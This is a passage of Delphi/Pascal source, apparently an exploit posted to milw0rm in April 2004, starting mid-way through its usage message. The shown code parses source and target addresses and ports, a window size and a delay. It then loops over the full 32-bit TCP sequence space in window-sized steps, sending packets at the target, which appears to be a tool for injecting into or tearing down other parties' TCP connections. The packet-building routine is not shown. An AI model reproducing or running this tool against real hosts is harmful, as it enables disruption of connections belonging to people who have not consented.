ip> <dest port> <window size> <send delay> [begin seq num]'); ExitProcess(0); end; begin if Length(ParamStr(1)) < 1 then DoExit; if Length(ParamStr(2)) < 1 then DoExit; if Length(ParamStr(3)) < 1 then DoExit; if Length(ParamStr(4)) < 1 then DoExit; if Length(ParamStr(5)) < 1 then DoExit; SourceHost := ParamStr(1); SourcePort := StrToInt(ParamStr(2)); TargetHost := ParamStr(3); TargetPort := StrToInt(ParamStr(4)); WindowSize := StrToInt(ParamStr(5)); Delay := StrToInt(ParamStr(6)); Randomize; WindowPos := Random(4294967295); if Length(ParamStr(7)) > 0 then WindowPos := StrToInt(ParamStr(7)); Odds := 4294967295 div WindowSize; WindowCount := 0; Init; while WindowCount < Odds do begin if WindowPos > 4294967295 then WindowPos := 0; Send(TargetHost, TargetPort, SourceHost, SourcePort, WindowPos, WindowSize); Inc(WindowCount); Inc(WindowPos, WindowSize); Sleep(Delay); end; end. // milw0rm.com [2004-04-22]